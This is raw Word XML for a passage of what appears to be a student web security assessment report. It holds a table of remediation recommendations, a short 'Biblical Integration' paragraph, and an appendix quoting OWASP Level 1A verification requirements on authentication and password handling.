        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="538497EE" w14:textId="77777777" w:rsidR="006860F0" w:rsidRDefault="006860F0" w:rsidP="00002AE1">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="20C56572" w14:textId="77777777" w:rsidR="00586449" w:rsidRDefault="00717F46" w:rsidP="00586449">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="36" w:name="_Toc46402737"/>
      <w:r>
        <w:t>Other Web</w:t>
      </w:r>
      <w:r w:rsidR="00586449">
        <w:t xml:space="preserve"> Recommendations</w:t>
      </w:r>
      <w:bookmarkEnd w:id="36"/>
    </w:p>
    <w:p w14:paraId="4FD1940A" w14:textId="77777777" w:rsidR="00586449" w:rsidRDefault="00586449" w:rsidP="00586449">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6364F0BB" w14:textId="77777777" w:rsidR="00586449" w:rsidRDefault="00586449" w:rsidP="00586449">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="54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6"/>
        <w:gridCol w:w="2458"/>
        <w:gridCol w:w="1668"/>
      </w:tblGrid>
      <w:tr w:rsidR="00586449" w:rsidRPr="004B7B87" w14:paraId="790F256A" w14:textId="77777777" w:rsidTr="00510F33">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5418" w:type="dxa"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="4F81BD"/>
          </w:tcPr>
          <w:p w14:paraId="327413D2" w14:textId="77777777" w:rsidR="00586449" w:rsidRPr="004B7B87" w:rsidRDefault="00586449" w:rsidP="00510F33">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="004B7B87">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Recommendation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2521" w:type="dxa"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="4F81BD"/>
          </w:tcPr>
          <w:p w14:paraId="2A29299F" w14:textId="77777777" w:rsidR="00586449" w:rsidRPr="004B7B87" w:rsidRDefault="00586449" w:rsidP="00510F33">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve">      </w:t>
            </w:r>
            <w:r w:rsidRPr="004B7B87">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Priority</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1709" w:type="dxa"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="4F81BD"/>
          </w:tcPr>
          <w:p w14:paraId="082E736F" w14:textId="77777777" w:rsidR="00586449" w:rsidRPr="004B7B87" w:rsidRDefault="00586449" w:rsidP="00510F33">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="004B7B87">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Remediation Effort</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00586449" w:rsidRPr="004B7B87" w14:paraId="3312893C" w14:textId="77777777" w:rsidTr="00510F33">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5418" w:type="dxa"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="DBE5F1"/>
          </w:tcPr>
          <w:p w14:paraId="551B4745" w14:textId="53D6F75A" w:rsidR="00586449" w:rsidRDefault="00586449" w:rsidP="00510F33">
            <w:pPr>
              <w:rPr>
                <w:bCs/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:bCs/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="005B3E25">
              <w:rPr>
                <w:bCs/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Appropriate security configuration should be tested to ensure the right users have access</w:t>
            </w:r>
            <w:r w:rsidR="00805FB9">
              <w:rPr>
                <w:bCs/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve"> to </w:t>
            </w:r>
            <w:r w:rsidR="00805FB9">
              <w:rPr>
                <w:bCs/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>appropriate parts of the web application</w:t>
            </w:r>
            <w:r w:rsidR="005B3E25">
              <w:rPr>
                <w:bCs/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve"> and is functioning as expected</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="128A1456" w14:textId="77777777" w:rsidR="006860F0" w:rsidRPr="00C41698" w:rsidRDefault="006860F0" w:rsidP="00510F33">
            <w:pPr>
              <w:rPr>
                <w:bCs/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2521" w:type="dxa"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="DBE5F1"/>
          </w:tcPr>
          <w:p w14:paraId="563ADACB" w14:textId="48ED2452" w:rsidR="00586449" w:rsidRPr="00C41698" w:rsidRDefault="005B3E25" w:rsidP="00510F33">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>Medium</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1709" w:type="dxa"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="DBE5F1"/>
          </w:tcPr>
          <w:p w14:paraId="2AE87663" w14:textId="292CB6B5" w:rsidR="00586449" w:rsidRPr="00C41698" w:rsidRDefault="005B3E25" w:rsidP="00510F33">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>16</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00586449" w:rsidRPr="004B7B87" w14:paraId="3552936C" w14:textId="77777777" w:rsidTr="00510F33">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5418" w:type="dxa"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="69279165" w14:textId="77777777" w:rsidR="006860F0" w:rsidRDefault="006860F0" w:rsidP="00510F33">
            <w:pPr>
              <w:rPr>
                <w:bCs/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="2E01BE49" w14:textId="32AFD171" w:rsidR="00586449" w:rsidRPr="00C41698" w:rsidRDefault="00586449" w:rsidP="00510F33">
            <w:r>
              <w:rPr>
                <w:bCs/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="00DA390A">
              <w:rPr>
                <w:bCs/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve">Ensure any sensitive information </w:t>
            </w:r>
            <w:r w:rsidR="008B2022">
              <w:rPr>
                <w:bCs/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve">that is handled or displayed </w:t>
            </w:r>
            <w:r w:rsidR="00DA390A">
              <w:rPr>
                <w:bCs/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>is</w:t>
            </w:r>
            <w:r w:rsidR="008B2022">
              <w:rPr>
                <w:bCs/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve"> not in conflict with laws such as HIPPA</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2521" w:type="dxa"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="13EDD442" w14:textId="47B96139" w:rsidR="00586449" w:rsidRPr="00C41698" w:rsidRDefault="00586449" w:rsidP="00510F33">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="008B2022">
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Low</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1709" w:type="dxa"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="25F4A45F" w14:textId="3D677D9E" w:rsidR="00586449" w:rsidRPr="00C41698" w:rsidRDefault="008B2022" w:rsidP="00510F33">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>10</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00586449" w:rsidRPr="004B7B87" w14:paraId="08EDC8F5" w14:textId="77777777" w:rsidTr="00510F33">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5418" w:type="dxa"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="DBE5F1"/>
          </w:tcPr>
          <w:p w14:paraId="3BEE77F1" w14:textId="00BB5BDE" w:rsidR="006860F0" w:rsidRDefault="008B2022" w:rsidP="00510F33">
            <w:pPr>
              <w:rPr>
                <w:bCs/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:bCs/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve">Ensure appropriate logging is taking place on the application </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="467C2CFF" w14:textId="77777777" w:rsidR="00586449" w:rsidRPr="00C41698" w:rsidRDefault="00586449" w:rsidP="00510F33">
            <w:pPr>
              <w:rPr>
                <w:bCs/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:bCs/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2521" w:type="dxa"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="DBE5F1"/>
          </w:tcPr>
          <w:p w14:paraId="24D70150" w14:textId="342F13D4" w:rsidR="00586449" w:rsidRPr="00C41698" w:rsidRDefault="008B2022" w:rsidP="00510F33">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Low</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1709" w:type="dxa"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="DBE5F1"/>
          </w:tcPr>
          <w:p w14:paraId="675A2942" w14:textId="11B25032" w:rsidR="00586449" w:rsidRPr="00C41698" w:rsidRDefault="008B2022" w:rsidP="00510F33">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>10</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00586449" w:rsidRPr="004B7B87" w14:paraId="534E33DF" w14:textId="77777777" w:rsidTr="00510F33">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5418" w:type="dxa"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="25431BC6" w14:textId="77777777" w:rsidR="006860F0" w:rsidRDefault="006860F0" w:rsidP="00510F33">
            <w:pPr>
              <w:rPr>
                <w:bCs/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="1A8D3A52" w14:textId="77777777" w:rsidR="00586449" w:rsidRPr="00C41698" w:rsidRDefault="00586449" w:rsidP="00510F33">
            <w:pPr>
              <w:rPr>
                <w:bCs/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:bCs/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2521" w:type="dxa"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="370328E4" w14:textId="77777777" w:rsidR="00586449" w:rsidRPr="00C41698" w:rsidRDefault="00586449" w:rsidP="00510F33">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1709" w:type="dxa"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="0F448926" w14:textId="77777777" w:rsidR="00586449" w:rsidRPr="00C41698" w:rsidRDefault="00586449" w:rsidP="00510F33">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="7A28CD45" w14:textId="77777777" w:rsidR="00744015" w:rsidRDefault="00744015" w:rsidP="00744015">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0A57D96A" w14:textId="77777777" w:rsidR="00744015" w:rsidRDefault="00744015" w:rsidP="00A00445">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="37" w:name="_Toc46402738"/>
      <w:r>
        <w:t>Biblical Integration Results</w:t>
      </w:r>
      <w:bookmarkEnd w:id="37"/>
    </w:p>
    <w:p w14:paraId="0A1DD794" w14:textId="67022F78" w:rsidR="00744015" w:rsidRPr="00744015" w:rsidRDefault="005E329B" w:rsidP="005E329B">
      <w:pPr>
        <w:ind w:firstLine="576"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The recommendations are applicable to the target of verification. Quick remediation leaves the target with less of an open window for vulnerabilities to be exposed by elements. The longer time passes without proper remediation the wider the window for an unexpected attack or vulnerability to be taken advantage of. Biblical scripture recommends following the narrow path as difficult as it may be because it leads to life and reward. In comparison the reward of follow through with the remediation is having a well operating web application and server. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35E40D40" w14:textId="77777777" w:rsidR="007C3EAC" w:rsidRDefault="00A905F3" w:rsidP="007C3EAC">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
      </w:pPr>
      <w:bookmarkStart w:id="38" w:name="_Toc46402739"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Appendix </w:t>
      </w:r>
      <w:r w:rsidR="007C3EAC">
        <w:t xml:space="preserve">– </w:t>
      </w:r>
      <w:r w:rsidR="00833CD4">
        <w:t xml:space="preserve">Security Requirement </w:t>
      </w:r>
      <w:r w:rsidR="007C3EAC">
        <w:t>Pass/Fail Verdicts</w:t>
      </w:r>
      <w:bookmarkEnd w:id="38"/>
    </w:p>
    <w:p w14:paraId="08DD2AD8" w14:textId="77777777" w:rsidR="009936D9" w:rsidRDefault="009936D9" w:rsidP="009936D9"/>
    <w:p w14:paraId="27C144BC" w14:textId="77777777" w:rsidR="001D1887" w:rsidRPr="009936D9" w:rsidRDefault="001D1887" w:rsidP="009936D9">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009936D9">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">The following are the OWASP and NIST requirements for public web sites – and the pass/fail determinations of those requirements based upon both automated scans and manual inspection. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="117B562B" w14:textId="77777777" w:rsidR="00F63F09" w:rsidRDefault="00F63F09" w:rsidP="00F63F09">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
      </w:pPr>
      <w:bookmarkStart w:id="39" w:name="_Toc46402740"/>
      <w:r>
        <w:t>OWASP Level 1A Pass/Fail Verdicts</w:t>
      </w:r>
      <w:bookmarkEnd w:id="39"/>
    </w:p>
    <w:p w14:paraId="43A56D5D" w14:textId="77777777" w:rsidR="009107BE" w:rsidRPr="009107BE" w:rsidRDefault="009107BE" w:rsidP="00F63F09">
      <w:pPr>
        <w:ind w:left="1440" w:hanging="1440"/>
        <w:rPr>
          <w:i/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3C615609" w14:textId="77777777" w:rsidR="00F63F09" w:rsidRPr="009107BE" w:rsidRDefault="00F63F09" w:rsidP="00F63F09">
      <w:pPr>
        <w:ind w:left="1440" w:hanging="1440"/>
        <w:rPr>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009107BE">
        <w:rPr>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">L1A.1 </w:t>
      </w:r>
      <w:r w:rsidRPr="009107BE">
        <w:rPr>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
        <w:t>The verifier shall dynamically scan the web application according to the Level 1A requirements specified in the [OWASP] “Detailed Verification Requirements” section [reproduced below for convenience].</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D2E7B85" w14:textId="77777777" w:rsidR="00F63F09" w:rsidRPr="009107BE" w:rsidRDefault="00F63F09" w:rsidP="00F63F09">
      <w:pPr>
        <w:ind w:left="1440" w:hanging="1440"/>
        <w:rPr>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7B459EDD" w14:textId="77777777" w:rsidR="00F63F09" w:rsidRPr="009107BE" w:rsidRDefault="00F63F09" w:rsidP="00F63F09">
      <w:pPr>
        <w:ind w:left="2160" w:hanging="720"/>
        <w:rPr>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009107BE">
        <w:rPr>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">V1.1 </w:t>
      </w:r>
      <w:r w:rsidRPr="009107BE">
        <w:rPr>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
        <w:t>The verifier shall identify all application components (either individual or groups of source files, libraries, and/or executables) present in the application.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38EC86BC" w14:textId="77777777" w:rsidR="00705B56" w:rsidRPr="009107BE" w:rsidRDefault="00705B56" w:rsidP="00F63F09">
      <w:pPr>
        <w:ind w:left="2160" w:hanging="720"/>
        <w:rPr>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="64F9BD46" w14:textId="77777777" w:rsidR="00F63F09" w:rsidRPr="009107BE" w:rsidRDefault="00F63F09" w:rsidP="00F63F09">
      <w:pPr>
        <w:ind w:left="2160" w:hanging="720"/>
        <w:rPr>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5BDF249C" w14:textId="77777777" w:rsidR="00F63F09" w:rsidRPr="009107BE" w:rsidRDefault="00F63F09" w:rsidP="00F63F09">
      <w:pPr>
        <w:ind w:left="2160" w:hanging="720"/>
        <w:rPr>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009107BE">
        <w:rPr>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">V2.1 </w:t>
      </w:r>
      <w:r w:rsidRPr="009107BE">
        <w:rPr>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
        <w:t>Verify that all pages and resources require authentication except those specifically intended to be public.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A8C4A05" w14:textId="77777777" w:rsidR="00624BEF" w:rsidRPr="009107BE" w:rsidRDefault="00624BEF" w:rsidP="00624BEF">
      <w:pPr>
        <w:ind w:left="2160" w:hanging="720"/>
        <w:rPr>
          <w:i/>
          <w:color w:val="008000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="13005106" w14:textId="77777777" w:rsidR="008F5834" w:rsidRDefault="008F5834" w:rsidP="00F63F09">
      <w:pPr>
        <w:ind w:left="2160" w:hanging="720"/>
        <w:rPr>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0E31174B" w14:textId="77777777" w:rsidR="00F63F09" w:rsidRDefault="00F63F09" w:rsidP="00F63F09">
      <w:pPr>
        <w:ind w:left="2160" w:hanging="720"/>
        <w:rPr>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009107BE">
        <w:rPr>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">V2.9 </w:t>
      </w:r>
      <w:r w:rsidRPr="009107BE">
        <w:rPr>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
        <w:t>Verify that if a maximum number of authentication attempts is exceeded, the account is locked.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C574FFF" w14:textId="77777777" w:rsidR="00D202DF" w:rsidRDefault="00D202DF" w:rsidP="00F63F09">
      <w:pPr>
        <w:ind w:left="2160" w:hanging="720"/>
        <w:rPr>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0CA4A283" w14:textId="77777777" w:rsidR="00F63F09" w:rsidRPr="009107BE" w:rsidRDefault="00F63F09" w:rsidP="00F63F09">
      <w:pPr>
        <w:ind w:left="2160" w:hanging="720"/>
        <w:rPr>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="22FB29E6" w14:textId="77777777" w:rsidR="00F63F09" w:rsidRDefault="00F63F09" w:rsidP="00F63F09">
      <w:pPr>
        <w:ind w:left="2160" w:hanging="720"/>
        <w:rPr>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009107BE">
        <w:rPr>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">V2.11 </w:t>
      </w:r>
      <w:r w:rsidRPr="009107BE">
        <w:rPr>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
        <w:t>Verify that all password fields do not echo the user’s password when it is entered.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="188319C6" w14:textId="77777777" w:rsidR="000B6B8C" w:rsidRDefault="000B6B8C" w:rsidP="00F63F09">
      <w:pPr>
        <w:ind w:left="2160" w:hanging="720"/>
        <w:rPr>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="788083C3" w14:textId="77777777" w:rsidR="00F63F09" w:rsidRPr="009107BE" w:rsidRDefault="00F63F09" w:rsidP="00F63F09">
      <w:pPr>
        <w:ind w:left="2160" w:hanging="720"/>
        <w:rPr>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="754BD0F0" w14:textId="77777777" w:rsidR="00F63F09" w:rsidRPr="009107BE" w:rsidRDefault="00F63F09" w:rsidP="00F63F09">
      <w:pPr>
        <w:ind w:left="2160" w:hanging="720"/>
        <w:rPr>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
